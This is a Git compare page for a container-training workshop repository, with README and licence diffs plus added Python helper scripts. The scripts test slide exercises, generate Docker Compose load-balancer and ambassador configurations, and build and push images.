Compare commits

..

4 Commits

Author | SHA1 | Message | Date
Jérôme Petazzoni | 58e76b81f2 | Fixing missing stack name | 2017-06-12 17:41:55 +02:00
Jérôme Petazzoni | a1adc2292f | Merge pull request #81 from soulshake/devopscon-compose-version (Fix docker-compose version) | 2017-06-11 23:01:33 +02:00
AJ Bowen | 8d6421ddea | Fix docker-compose version | 2017-06-11 23:00:22 +02:00
Jérôme Petazzoni | 63b6db4843 | First round of updates for devopscon | 2017-06-10 21:40:05 +02:00
470 changed files with 10159 additions and 75947 deletions

22
.gitignore vendored
View File

@@ -1,22 +1,8 @@
*.pyc
*.swp
*~
prepare-vms/ips.txt
prepare-vms/ips.html
prepare-vms/ips.pdf
prepare-vms/settings.yaml
prepare-vms/tags
prepare-vms/infra
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
node_modules
### macOS ###
# General
.DS_Store
.AppleDouble
.LSOverride
### Windows ###
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db

View File

@@ -1,24 +0,0 @@
Checklist to use when delivering a workshop
Authored by Jérôme; additions by Bridget
- [ ] Create event-named branch (such as `conferenceYYYY`) in the [main repo](https://github.com/jpetazzo/container.training/)
- [ ] Create file `slides/_redirects` containing a link to the desired tutorial: `/ /kube-halfday.yml.html 200`
- [ ] Push local branch to GitHub and merge into main repo
- [ ] [Netlify setup](https://app.netlify.com/sites/container-training/settings/domain): create subdomain for event-named branch
- [ ] Add link to event-named branch to [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] Update the slides that says which versions we are using for [kube](https://github.com/jpetazzo/container.training/blob/master/slides/kube/versions-k8s.md) or [swarm](https://github.com/jpetazzo/container.training/blob/master/slides/swarm/versions.md) workshops
- [ ] Update the version of Compose and Machine in [settings](https://github.com/jpetazzo/container.training/tree/master/prepare-vms/settings)
- [ ] (optional) Create chatroom
- [ ] (optional) Set chatroom in YML ([kube half-day example](https://github.com/jpetazzo/container.training/blob/master/slides/kube-halfday.yml#L6-L8)) and deploy
- [ ] (optional) Put chat link on [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] How many VMs do we need? Check with event organizers ahead of time
- [ ] Provision VMs (slightly more than we think we'll need)
- [ ] Change password on presenter's VMs (to forestall any hijinx)
- [ ] Onsite: walk the room to count seats, check power supplies, lectern, A/V setup
- [ ] Print cards
- [ ] Cut cards
- [ ] Last-minute merge from master
- [ ] Check that all looks good
- [ ] DELIVER!
- [ ] Shut down VMs
- [ ] Update index.html to remove chat link and move session to past things

19
LICENSE
View File

@@ -1,12 +1,13 @@
The code in this repository is licensed under the Apache License
Version 2.0. You may obtain a copy of this license at:
Copyright 2015 Jérôme Petazzoni
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
The instructions and slides in this repository (e.g. the files
with extension .md and .yml in the "slides" subdirectory) are
under the Creative Commons Attribution 4.0 International Public
License. You may obtain a copy of this license at:
https://creativecommons.org/licenses/by/4.0/legalcode
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

297
README.md
View File

@@ -1,134 +1,137 @@
# Container Training
# Docker Orchestration Workshop
This repository (formerly known as `orchestration-workshop`)
contains materials (slides, scripts, demo app, and other
code samples) used for various workshops, tutorials, and
training sessions around the themes of Docker, containers,
and orchestration.
For the moment, it includes:
- Introduction to Docker and Containers,
- Container Orchestration with Docker Swarm,
- Container Orchestration with Kubernetes.
These materials have been designed around the following
principles:
- they assume very little prior knowledge of Docker,
containers, or a particular programming language;
- they can be used in a classroom setup (with an
instructor), or self-paced at home;
- they are hands-on, meaning that they contain lots
of examples and exercises that you can easily
reproduce;
- they progressively introduce concepts in chapters
that build on top of each other.
If you're looking for the materials, you can stop reading
right now, and hop to http://container.training/, which
hosts all the slide decks available.
The rest of this document explains how this repository
is structured, and how to use it to deliver (or create)
your own tutorials.
This is the material (slides, scripts, demo app, and other
code samples) for the "Docker orchestration workshop"
written and delivered by Jérôme Petazzoni (and lots of others)
non-stop since June 2015.
## Why a single repository?
## Content
All these materials have been gathered in a single repository
because they have a few things in common:
- some [common slides](slides/common/) that are re-used
(and updated) identically between different decks;
- a [build system](slides/) generating HTML slides from
Markdown source files;
- a [semi-automated test harness](slides/autopilot/) to check
that the exercises and examples provided work properly;
- a [PhantomJS script](slides/slidechecker.js) to check
that the slides look good and don't have formatting issues;
- [deployment scripts](prepare-vms/) to start training
VMs in bulk;
- a fancy pipeline powered by
[Netlify](https://www.netlify.com/) and continuously
deploying `master` to http://container.training/.
- Chapter 1: Getting Started: running apps with docker-compose
- Chapter 2: Scaling out with Swarm Mode
- Chapter 3: Operating the Swarm (networks, updates, logging, metrics)
- Chapter 4: Deeper in Swarm (stateful services, scripting, DAB's)
## What are the different courses available?
## Quick start (or, "I want to try it!")
**Introduction to Docker** is derived from the first
"Docker Fundamentals" training materials. For more information,
see [jpetazzo/intro-to-docker](https://github.com/jpetazzo/intro-to-docker).
The version in this repository has been adapted to the Markdown
publishing pipeline. It is still maintained, but only receives
minor updates once in a while.
This workshop is designed to be *hands on*, i.e. to give you a step-by-step
guide where you will build your own Docker cluster, and use it to deploy
a sample application.
**Container Orchestration with Docker Swarm** (formerly
known as "Orchestration Workshop") is a workshop created by Jérôme
Petazzoni in June 2015. Since then, it has been continuously updated
and improved, and has received contributions from many other authors.
It is actively maintained.
The easiest way to follow the workshop is to attend it when it is delivered
by an instructor. In that case, the instructor will generally give you
credentials (IP addresses, login, password) to connect to your own cluster
of virtual machines; and the [slides](http://jpetazzo.github.io/orchestration-workshop)
assume that you have such a cluster.
**Container Orchestration with Kubernetes** was created by
Jérôme Petazzoni in October 2017, with help and feedback from
a few other contributors. It is actively maintained.
If you want to follow the workshop on your own, and want to have your
own cluster, we have multiple solutions for you!
## Repository structure
### Using [play-with-docker](http://play-with-docker.com/)
- [bin](bin/)
- A few helper scripts that you can safely ignore for now.
- [dockercoins](dockercoins/)
- The demo app used throughout the orchestration workshops.
- [efk](efk/), [elk](elk/), [prom](prom/), [snap](snap/):
- Logging and metrics stacks used in the later parts of
the orchestration workshops.
- [prepare-local](prepare-local/), [prepare-machine](prepare-machine/):
- Contributed scripts to automate the creation of local environments.
These could use some help to test/check that they work.
- [prepare-vms](prepare-vms/):
- Scripts to automate the creation of AWS instances for students.
These are routinely used and actively maintained.
- [slides](slides/):
- All the slides! They are assembled from Markdown files with
a custom Python script, and then rendered using [gnab/remark](
https://github.com/gnab/remark). Check this directory for more details.
- [stacks](stacks/):
- A handful of Compose files (version 3) that make it easy to
deploy complex application stacks.
This method is the easiest to get started with (you don't need any extra
account or resources!), but it will require a bit of adaptation from the workshop slides.
To get started, go to [play-with-docker](http://play-with-docker.com/), and
click on _ADD NEW INSTANCE_ five times. You will get five "docker-in-docker"
containers, all on a private network. These are your five nodes for the workshop!
When the instructions in the slides tell you to "SSH on node X", just go to
the tab corresponding to that node.
The nodes are not directly reachable from outside; so when the slides tell
you to "connect to the IP address of your node on port XYZ" you will have
to use a different method.
We suggest using "supergrok", a container offering an NGINX+ngrok combo to
expose your services. To use it, just start the `jpetazzo/supergrok` image
(on any of your nodes). The image will output further instructions:
```
docker run --name supergrok -d jpetazzo/supergrok
docker logs --follow supergrok
```
The logs of the container will give you a tunnel address and explain
how to connect to exposed services. That's all you need to do!
We are also working on a native proxy, embedded in Play-With-Docker.
Stay tuned!
<!--
- You can use a proxy provided by Play-With-Docker. When the slides
instruct you to connect to nodeX on port ABC, instead, you will connect
to http://play-with-docker.com/XXX.XXX.XXX.XXX:ABC, where XXX.XXX.XXX.XXX
is the IP address of nodeX.
-->
Note that the instances provided by Play-With-Docker have a short lifespan
(a few hours only), so if you want to do the workshop over multiple sessions,
you will have to start over each time ... Or create your own cluster with
one of the methods described below.
## Course structure
### Using Docker Machine to create your own cluster
(This applies only for the orchestration workshops.)
This method requires a bit more work to get started, but you get a permanent
cluster, with fewer limitations.
The workshop introduces a demo app, "DockerCoins," built
around a micro-services architecture. First, we run it
on a single node, using Docker Compose. Then, we pretend
that we need to scale it, and we use an orchestrator
(SwarmKit or Kubernetes) to deploy and scale the app on
a cluster.
You will need Docker Machine (if you have Docker Mac, Docker Windows, or
the Docker Toolbox, you're all set already). You will also need:
We explain the concepts of the orchestrator. For SwarmKit,
we set up the cluster with `docker swarm init` and `docker swarm join`.
For Kubernetes, we use pre-configured clusters.
- credentials for a cloud provider (e.g. API keys or tokens),
- or a local install of VirtualBox or VMware (or anything supported
by Docker Machine).
Then, we cover more advanced concepts: scaling, load balancing,
updates, global services or daemon sets.
There are a number of advanced optional chapters about
logging, metrics, secrets, network encryption, etc.
The content is very modular: it is broken down into a large
number of Markdown files that are put together according
to a YAML manifest (see the sketch below). This makes it
very easy to re-use content between different workshops.
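A minimal sketch of what such a manifest could look like (the key names and file paths below are assumptions for illustration; the authoritative schema is whatever the build script in [slides](slides/) expects):
```yaml
# Hypothetical slide manifest: a title plus an ordered list of Markdown chapters.
title: "Container Orchestration with Docker Swarm"
chapters:
  - common/title.md        # shared slides re-used across decks
  - swarm/intro.md
  - swarm/creatingswarm.md
  - common/thankyou.md
```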
Full instructions are in the [prepare-machine](prepare-machine) subdirectory.
### DockerCoins
### Using our scripts to mass-create a bunch of clusters
The sample app is in the `dockercoins` directory.
It's used during all chapters
Since we often deliver the workshop during conferences or similar events,
we have scripts to automate the creation of a bunch of clusters using
AWS EC2. If you want to create multiple clusters and have EC2 credits,
check the [prepare-vms](prepare-vms) directory for more information.
## How This Repo is Organized
- **dockercoins**
- Sample App: compose files and source code for the dockercoins sample apps
used throughout the workshop
- **docs**
- Slide Deck: presentation slide deck, works out-of-box with GitHub Pages,
uses https://remarkjs.com
- **prepare-local**
- untested scripts for automating the creation of local virtualbox VM's
(could use your help validating)
- **prepare-machine**
- instructions explaining how to use Docker Machine to create VMs
- **prepare-vms**
- scripts for automating the creation of AWS instances for students
## Slide Deck
- The slides are in the `docs` directory.
- To view them locally open `docs/index.html` in your browser. It works
offline too.
- To view them online open https://jpetazzo.github.io/orchestration-workshop/
in your browser.
- When you fork this repo, be sure GitHub Pages is enabled in repo Settings
for "master branch /docs folder" and you'll have your own website for them.
- They use https://remarkjs.com to allow simple Markdown in an HTML file that
remark will transform into a presentation in the browser (see the minimal example below).
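For reference, the standard remark boilerplate looks roughly like this; it is a minimal sketch, not the actual `docs/index.html`, which also bundles the workshop content and styling:
```html
<html>
  <body>
    <textarea id="source">
class: center, middle
# My workshop title
---
# First real slide
Plain Markdown goes here; `---` separates slides, `???` starts speaker notes.
    </textarea>
    <script src="https://remarkjs.com/downloads/remark-latest.min.js"></script>
    <script>var slideshow = remark.create();</script>
  </body>
</html>
```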
## Sample App: Dockercoins!
The sample app is in the `dockercoins` directory. It's used during all chapters
for explaining different concepts of orchestration.
To see it in action:
@@ -138,18 +141,13 @@ To see it in action:
- the web UI will be available on port 8000
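(The steps themselves are collapsed by the diff hunk above; under the standard Compose workflow they boil down to roughly this sketch, not the verbatim README content:)
```
git clone https://github.com/jpetazzo/container.training
cd container.training/dockercoins
docker-compose up -d
# then point a browser at port 8000 of your Docker host to see the web UI
```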
*If you just want to run the workshop for yourself, you can stop reading
here. If you want to deliver the workshop for others (i.e. if you
want to become an instructor), keep reading!*
## Running the Workshop
If you want to deliver one of these workshops yourself,
this section is for you!
> *This section has been mostly contributed by
> [Bret Fisher](https://twitter.com/bretfisher), who was
> one of the first persons to have the bravery of delivering
> this workshop without me. Thanks Bret! 🍻
>
> Jérôme.*
### General timeline of planning a workshop
@@ -157,7 +155,7 @@ this section is for you!
understand the different `dockercoins` repo's and the steps we go through to
get to a full Swarm Mode cluster of many containers. You'll update the first
few slides and last slide at a minimum, with your info.
- ~~Your docs directory can use GitHub Pages.~~
- Your docs directory can use GitHub Pages.
- This workshop expects 5 servers per student. You can get away with as few
as 2 servers per student, but you'll need to change the slide deck to
accommodate. More servers = more fun.
@@ -183,14 +181,13 @@ this section is for you!
they need for class.
- Typically you create the servers the day before or morning of workshop, and
leave them up the rest of day after workshop. If creating hundreds of servers,
you'll likely want to run all these `workshopctl` commands from a dedicated
you'll likely want to run all these `trainer` commands from a dedicated
instance you have in the same region as the instances you want to create. It's much
faster this way if you're on poor internet. Also, create 2 sets of servers for
yourself: use one during the workshop and keep the 2nd as a backup.
- Remember you'll need to print the "cards" for students, so you'll need to
create instances while you have a way to print them.
### Things That Could Go Wrong
- Creating AWS instances ahead of time, and you hit its limits in region and
@@ -199,20 +196,18 @@ this section is for you!
locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
prevent you from losing your place if you get disconnected from servers.
prevent you from loosing your place if you get disconnected from servers.
https://tmux.github.io
- Forget to print "cards" and cut them up for handing out IP's.
- Forget to have fun and focus on your students!
### Creating the VMs
`prepare-vms/workshopctl` is the script that gets you most of what you need for
`prepare-vms/trainer` is the script that gets you most of what you need for
setting up instances. See
[prepare-vms/README.md](prepare-vms)
for all the info on tools and scripts.
### Content for Different Workshop Durations
With all the slides, this workshop is a full day long. If you need to deliver
@@ -221,7 +216,6 @@ can replace `---` with `???` which will hide slides. Or leave them there and
add something like `(EXTRA CREDIT)` to title so students can still view the
content but you also know to skip during presentation.
#### 3 Hour Version
- Limit time on debug tools, maybe skip a few. *"Chapter 1:
@@ -233,7 +227,6 @@ content but you also know to skip during presentation.
- Mention what DAB's are, but make this part optional in case you run out
of time
#### 2 Hour Version
- Skip all the above, and:
@@ -247,17 +240,6 @@ content but you also know to skip during presentation.
- Last 15-30 minutes is for stateful services, DAB files, and questions.
### Pre-built images
There are pre-built images for the 4 components of the DockerCoins demo app: `dockercoins/hasher:v0.1`, `dockercoins/rng:v0.1`, `dockercoins/webui:v0.1`, and `dockercoins/worker:v0.1`. They correspond to the code in this repository.
There are also three variants, for demo purposes:
- `dockercoins/rng:v0.2` is broken (the server won't even start),
- `dockercoins/webui:v0.2` has bigger font on the Y axis and a green graph (instead of blue),
- `dockercoins/worker:v0.2` is 11x slower than `v0.1`.
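For example, assuming the app is deployed as a Swarm stack named `dockercoins` (the service name below is an assumption following the usual stack naming), rolling out the slower worker to demo a rolling update could look like:
```
# Roll out the intentionally slower worker, then roll back to the original image.
docker service update --image dockercoins/worker:v0.2 dockercoins_worker
docker service update --rollback dockercoins_worker
```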
## Past events
Since its inception, this workshop has been delivered dozens of times,
@@ -289,34 +271,13 @@ If there is a bug and you can't fix it, but you can
reproduce it: submit an issue explaining how to reproduce.
If there is a bug and you can't even reproduce it:
sorry. It is probably an Heisenbug. We can't act on it
until it's reproducible, alas.
sorry. It is probably an Heisenbug. I can't act on it
until it's reproducible.
if you have attended this workshop and have feedback,
or if you want us to deliver that workshop at your
conference or for your company: contact me (jerome
at docker dot com).
# “Please teach us!”
If you have attended one of these workshops, and want
your team or organization to attend a similar one, you
can look at the list of upcoming events on
http://container.training/.
You are also welcome to reuse these materials to run
your own workshop, for your team or even at a meetup
or conference. In that case, you might enjoy watching
[Bridget Kromhout's talk at KubeCon 2018 Europe](
https://www.youtube.com/watch?v=mYsp_cGY2O0), explaining
precisely how to run such a workshop yourself.
Finally, you can also contact the following persons,
who are experienced speakers, are familiar with the
material, and are available to deliver these workshops
at your conference or for your company:
- jerome dot petazzoni at gmail dot com
- bret at bretfisher dot com
(If you are willing and able to deliver such workshops,
feel free to submit a PR to add your name to that list!)
**Thank you!**
Thank you!

191
autotest/autotest.py Executable file
View File

@@ -0,0 +1,191 @@
#!/usr/bin/env python
import os
import re
import signal
import subprocess
import time
def print_snippet(snippet):
print(78*'-')
print(snippet)
print(78*'-')
class Snippet(object):
def __init__(self, slide, content):
self.slide = slide
self.content = content
self.actions = []
def __str__(self):
return self.content
class Slide(object):
current_slide = 0
def __init__(self, content):
Slide.current_slide += 1
self.number = Slide.current_slide
# Remove commented-out slides
# (remark.js considers ??? to be the separator for speaker notes)
content = re.split("\n\?\?\?\n", content)[0]
self.content = content
self.snippets = []
exercises = re.findall("\.exercise\[(.*)\]", content, re.DOTALL)
for exercise in exercises:
if "```" in exercise and "<br/>`" in exercise:
print("! Exercise on slide {} has both ``` and <br/>` delimiters, skipping."
.format(self.number))
print_snippet(exercise)
elif "```" in exercise:
for snippet in exercise.split("```")[1::2]:
self.snippets.append(Snippet(self, snippet))
elif "<br/>`" in exercise:
for snippet in re.findall("<br/>`(.*)`", exercise):
self.snippets.append(Snippet(self, snippet))
else:
print(" Exercise on slide {} has neither ``` or <br/>` delimiters, skipping."
.format(self.number))
def __str__(self):
text = self.content
for snippet in self.snippets:
text = text.replace(snippet.content, ansi("7")(snippet.content))
return text
def ansi(code):
return lambda s: "\x1b[{}m{}\x1b[0m".format(code, s)
slides = []
with open("index.html") as f:
content = f.read()
for slide in re.split("\n---?\n", content):
slides.append(Slide(slide))
is_editing_file = False
placeholders = {}
for slide in slides:
for snippet in slide.snippets:
content = snippet.content
# Multi-line snippets should be ```highlightsyntax...
# Single-line snippets will be interpreted as shell commands
if '\n' in content:
highlight, content = content.split('\n', 1)
else:
highlight = "bash"
content = content.strip()
# If the previous snippet was a file fragment, and the current
# snippet is not YAML or EDIT, complain.
if is_editing_file and highlight not in ["yaml", "edit"]:
print("! On slide {}, previous snippet was YAML, so what do what do?"
.format(slide.number))
print_snippet(content)
is_editing_file = False
if highlight == "yaml":
is_editing_file = True
elif highlight == "placeholder":
for line in content.split('\n'):
variable, value = line.split(' ', 1)
placeholders[variable] = value
elif highlight == "bash":
for variable, value in placeholders.items():
quoted = "`{}`".format(variable)
if quoted in content:
content = content.replace(quoted, value)
del placeholders[variable]
if '`' in content:
print("! The following snippet on slide {} contains a backtick:"
.format(slide.number))
print_snippet(content)
continue
print("_ "+content)
snippet.actions.append((highlight, content))
elif highlight == "edit":
print(". "+content)
snippet.actions.append((highlight, content))
elif highlight == "meta":
print("^ "+content)
snippet.actions.append((highlight, content))
else:
print("! Unknown highlight {!r} on slide {}.".format(highlight, slide.number))
if placeholders:
print("! Remaining placeholder values: {}".format(placeholders))
actions = sum([snippet.actions for snippet in sum([slide.snippets for slide in slides], [])], [])
# Strip ^{ ... ^} for now
def strip_curly_braces(actions, in_braces=False):
if actions == []:
return []
elif actions[0] == ("meta", "^{"):
return strip_curly_braces(actions[1:], True)
elif actions[0] == ("meta", "^}"):
return strip_curly_braces(actions[1:], False)
elif in_braces:
return strip_curly_braces(actions[1:], True)
else:
return [actions[0]] + strip_curly_braces(actions[1:], False)
actions = strip_curly_braces(actions)
background = []
cwd = os.path.expanduser("~")
env = {}
for current_action, next_action in zip(actions, actions[1:]+[("bash", "true")]):
if current_action[0] == "meta":
continue
print(ansi(7)(">>> {}".format(current_action[1])))
time.sleep(1)
popen_options = dict(shell=True, cwd=cwd, stdin=subprocess.PIPE, preexec_fn=os.setpgrp)
# The following hack allows us to capture the environment variables set by `docker-machine env`
# FIXME: this doesn't handle `unset` for now
if any([
"eval $(docker-machine env" in current_action[1],
"DOCKER_HOST" in current_action[1],
"COMPOSE_FILE" in current_action[1],
]):
popen_options["stdout"] = subprocess.PIPE
current_action[1] += "\nenv"
proc = subprocess.Popen(current_action[1], **popen_options)
proc.cmd = current_action[1]
if next_action[0] == "meta":
print(">>> {}".format(next_action[1]))
time.sleep(3)
if next_action[1] == "^C":
os.killpg(proc.pid, signal.SIGINT)
proc.wait()
elif next_action[1] == "^Z":
# Let the process run
background.append(proc)
elif next_action[1] == "^D":
proc.communicate()
proc.wait()
else:
print("! Unknown meta action {} after snippet:".format(next_action[1]))
print_snippet(next_action[1])
print(ansi(7)("<<< {}".format(current_action[1])))
else:
proc.wait()
if "stdout" in popen_options:
stdout, stderr = proc.communicate()
for line in stdout.split('\n'):
if line.startswith("DOCKER_"):
variable, value = line.split('=', 1)
env[variable] = value
print("=== {}={}".format(variable, value))
print(ansi(7)("<<< {} >>> {}".format(proc.returncode, current_action[1])))
if proc.returncode != 0:
print("Got non-zero status code; aborting.")
break
if current_action[1].startswith("cd "):
cwd = os.path.expanduser(current_action[1][3:])
for proc in background:
print("Terminating background process:")
print_snippet(proc.cmd)
proc.terminate()
proc.wait()
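To illustrate what the script above consumes: it scans the rendered slides for `.exercise[...]` blocks and extracts snippets delimited either by triple backticks or by `<br/>` plus backticks. A made-up slide fragment that it would pick up (the commands are illustrative) could look like:
```
.exercise[

- Check that all the nodes have joined the cluster:
  <br/>`docker node ls`

- Look at the running services:
  <br/>`docker service ls`

]
```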

1
autotest/index.html Symbolic link
View File

@@ -0,0 +1 @@
../www/htdocs/index.html

42
bin/add-load-balancer-v1.py Executable file
View File

@@ -0,0 +1,42 @@
#!/usr/bin/env python
import os
import sys
import yaml
# arg 1 = service name
# arg 2 = number of instances
service_name = sys.argv[1]
desired_instances = int(sys.argv[2])
compose_file = os.environ["COMPOSE_FILE"]
input_file, output_file = compose_file, compose_file
config = yaml.load(open(input_file))
# The ambassadors need to know the service port to use.
# Those ports must be declared here.
ports = yaml.load(open("ports.yml"))
port = str(ports[service_name])
command_line = port
depends_on = []
for n in range(1, 1+desired_instances):
config["services"]["{}{}".format(service_name, n)] = config["services"][service_name]
command_line += " {}{}:{}".format(service_name, n, port)
depends_on.append("{}{}".format(service_name, n))
config["services"][service_name] = {
"image": "jpetazzo/hamba",
"command": command_line,
"depends_on": depends_on,
}
if "networks" in config["services"]["{}1".format(service_name)]:
config["services"][service_name]["networks"] = config["services"]["{}1".format(service_name)]["networks"]
yaml.safe_dump(config, open(output_file, "w"), default_flow_style=False)
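The script above (like `link-to-ambassadors.py` further down) reads a `ports.yml` file mapping each service name to the port its load balancers and ambassadors should publish. A hypothetical example, with service names and port values that are purely illustrative (loosely matching the DockerCoins components):
```yaml
# Hypothetical ports.yml: service name -> port published by its load balancer/ambassadors
redis: 6379
rng: 80
hasher: 80
```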

87
bin/add-load-balancer-v2.py Executable file
View File

@@ -0,0 +1,87 @@
#!/usr/bin/env python
import os
import sys
import yaml
def error(msg):
print("ERROR: {}".format(msg))
exit(1)
# arg 1 = service name
service_name = sys.argv[1]
compose_file = os.environ["COMPOSE_FILE"]
input_file, output_file = compose_file, compose_file
config = yaml.load(open(input_file))
version = config.get("version")
if version != "2":
error("Unsupported $COMPOSE_FILE version: {!r}".format(version))
# The load balancers need to know the service port to use.
# Those ports must be declared here.
ports = yaml.load(open("ports.yml"))
port = str(ports[service_name])
if service_name not in config["services"]:
error("service {} not found in $COMPOSE_FILE"
.format(service_name))
lb_name = "{}-lb".format(service_name)
be_name = "{}-be".format(service_name)
wd_name = "{}-wd".format(service_name)
if lb_name in config["services"]:
error("load balancer {} already exists in $COMPOSE_FILE"
.format(lb_name))
if wd_name in config["services"]:
error("dns watcher {} already exists in $COMPOSE_FILE"
.format(wd_name))
service = config["services"][service_name]
if "networks" in service:
error("service {} has custom networks"
.format(service_name))
# Put the service on its own network.
service["networks"] = {service_name: {"aliases": [ be_name ] } }
# Put a label indicating which load balancer is responsible for this service.
if "labels" not in service:
service["labels"] = {}
service["labels"]["loadbalancer"] = lb_name
# Add the load balancer.
config["services"][lb_name] = {
"image": "jpetazzo/hamba",
"command": "{} {} {}".format(port, be_name, port),
"depends_on": [ service_name ],
"networks": {
"default": {
"aliases": [ service_name ],
},
service_name: None,
},
}
# Add the DNS watcher.
config["services"][wd_name] = {
"image": "jpetazzo/watchdns",
"command": "{} {} {}".format(port, be_name, port),
"volumes_from": [ lb_name ],
"networks": {
service_name: None,
},
}
if "networks" not in config:
config["networks"] = {}
if service_name not in config["networks"]:
config["networks"][service_name] = None
yaml.safe_dump(config, open(output_file, "w"), default_flow_style=False)

63
bin/build-tag-push.py Executable file
View File

@@ -0,0 +1,63 @@
#!/usr/bin/env python
from common import ComposeFile
import os
import subprocess
import time
registry = os.environ.get("DOCKER_REGISTRY")
if not registry:
print("Please set the DOCKER_REGISTRY variable, e.g.:")
print("export DOCKER_REGISTRY=jpetazzo # use the Docker Hub")
print("export DOCKER_REGISTRY=localhost:5000 # use a local registry")
exit(1)
# Get the name of the current directory.
project_name = os.path.basename(os.path.realpath("."))
# Version used to tag the generated Docker image, using the UNIX timestamp or the given version.
if "VERSION" not in os.environ:
version = str(int(time.time()))
else:
version = os.environ["VERSION"]
# Execute "docker-compose build" and abort if it fails.
subprocess.check_call(["docker-compose", "-f", "docker-compose.yml", "build"])
# Load the services from the input docker-compose.yml file.
# TODO: run parallel builds.
compose_file = ComposeFile("docker-compose.yml")
# Iterate over all services that have a "build" definition.
# Tag them, and initiate a push in the background.
push_operations = dict()
for service_name, service in compose_file.services.items():
if "build" in service:
compose_image = "{}_{}".format(project_name, service_name)
registry_image = "{}/{}:{}".format(registry, compose_image, version)
# Re-tag the image so that it can be uploaded to the registry.
subprocess.check_call(["docker", "tag", compose_image, registry_image])
# Spawn "docker push" to upload the image.
push_operations[service_name] = subprocess.Popen(["docker", "push", registry_image])
# Replace the "build" definition by an "image" definition,
# using the name of the image on the registry.
del service["build"]
service["image"] = registry_image
# Wait for push operations to complete.
for service_name, popen_object in push_operations.items():
print("Waiting for {} push to complete...".format(service_name))
popen_object.wait()
print("Done.")
# Write the new docker-compose.yml file.
if "COMPOSE_FILE" not in os.environ:
os.environ["COMPOSE_FILE"] = "docker-compose.yml-{}".format(version)
print("Writing to new Compose file:")
else:
print("Writing to provided Compose file:")
print("COMPOSE_FILE={}".format(os.environ["COMPOSE_FILE"]))
compose_file.save()

76
bin/common.py Executable file
View File

@@ -0,0 +1,76 @@
import os
import subprocess
import sys
import time
import yaml
def COMPOSE_FILE():
if "COMPOSE_FILE" not in os.environ:
print("The $COMPOSE_FILE environment variable is not set. Aborting.")
exit(1)
return os.environ["COMPOSE_FILE"]
class ComposeFile(object):
def __init__(self, filename=None):
if filename is None:
filename = COMPOSE_FILE()
if not os.path.isfile(filename):
print("File {!r} does not exist. Aborting.".format(filename))
exit(1)
self.data = yaml.load(open(filename))
@property
def services(self):
if self.data.get("version") == "2":
return self.data["services"]
else:
return self.data
def save(self, filename=None):
if filename is None:
filename = COMPOSE_FILE()
with open(filename, "w") as f:
yaml.safe_dump(self.data, f, default_flow_style=False)
# Executes a bunch of commands in parallel, but no more than N at a time.
# This allows a large number of tasks to be executed concurrently,
# without turning into a fork bomb.
# `parallelism` is the number of tasks to execute simultaneously.
# `commands` is a list of tasks to execute.
# Each task is itself a list, where the first element is a descriptive
# string, and the following elements are the arguments to pass to Popen.
def parallel_run(commands, parallelism):
running = []
# While stuff is running, or we have stuff to run...
while commands or running:
# While there is stuff to run, and room in the pipe...
while commands and len(running)<parallelism:
command = commands.pop(0)
print("START {}".format(command[0]))
popen = subprocess.Popen(
command[1:], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
popen._desc = command[0]
running.append(popen)
must_sleep = True
for popen in running:
status = popen.poll()
if status is not None:
must_sleep = False
running.remove(popen)
if status==0:
print("OK {}".format(popen._desc))
else:
print("ERROR {} [Exit status: {}]"
.format(popen._desc, status))
output = "\n" + popen.communicate()[0].strip()
output = output.replace("\n", "\n| ")
print(output)
else:
print("WAIT ({} running, {} more to run)"
.format(len(running), len(commands)))
if must_sleep:
time.sleep(1)
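A minimal usage sketch of `parallel_run()` as defined above (the commands themselves are made up):
```python
# Run a trivial command against five nodes, at most three at a time.
# Each task is [description, arg0, arg1, ...]; everything after the
# description is handed to subprocess.Popen.
from common import parallel_run

commands = [
    ["uptime on node{}".format(n), "ssh", "node{}".format(n), "uptime"]
    for n in range(1, 6)
]
parallel_run(commands, 3)
```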

69
bin/configure-ambassadors.py Executable file
View File

@@ -0,0 +1,69 @@
#!/usr/bin/env python
from common import parallel_run
import os
import subprocess
project_name = os.path.basename(os.path.realpath("."))
# Get all services and backends in our compose application.
containers_data = subprocess.check_output([
"docker", "ps",
"--filter", "label=com.docker.compose.project={}".format(project_name),
"--format", '{{ .ID }} '
'{{ .Label "com.docker.compose.service" }} '
'{{ .Ports }}',
])
# Build list of backends.
frontend_ports = dict()
backends = dict()
for container in containers_data.split('\n'):
if not container:
continue
# TODO: support services with multiple ports!
container_id, service_name, port = container.split(' ')
if not port:
continue
backend, frontend = port.split("->")
backend_addr, backend_port = backend.split(':')
frontend_port, frontend_proto = frontend.split('/')
# TODO: deal with udp (mostly skip it?)
assert frontend_proto == "tcp"
# TODO: check inconsistencies between port mappings
frontend_ports[service_name] = frontend_port
if service_name not in backends:
backends[service_name] = []
backends[service_name].append((backend_addr, backend_port))
# Get all existing ambassadors for this application.
ambassadors_data = subprocess.check_output([
"docker", "ps",
"--filter", "label=ambassador.project={}".format(project_name),
"--format", '{{ .ID }} '
'{{ .Label "ambassador.service" }} '
'{{ .Label "ambassador.bindaddr" }}',
])
# Update ambassadors.
operations = []
for ambassador in ambassadors_data.split('\n'):
if not ambassador:
continue
ambassador_id, service_name, bind_address = ambassador.split()
print("Updating configuration for {}/{} -> {}:{} -> {}"
.format(service_name, ambassador_id,
bind_address, frontend_ports[service_name],
backends[service_name]))
command = [
ambassador_id,
"docker", "run", "--rm", "--volumes-from", ambassador_id,
"jpetazzo/hamba", "reconfigure",
"{}:{}".format(bind_address, frontend_ports[service_name])
]
for backend_addr, backend_port in backends[service_name]:
command.extend([backend_addr, backend_port])
operations.append(command)
# Execute all commands in parallel.
parallel_run(operations, 10)

71
bin/create-ambassadors.py Executable file
View File

@@ -0,0 +1,71 @@
#!/usr/bin/env python
from common import ComposeFile, parallel_run
import os
import subprocess
config = ComposeFile()
project_name = os.path.basename(os.path.realpath("."))
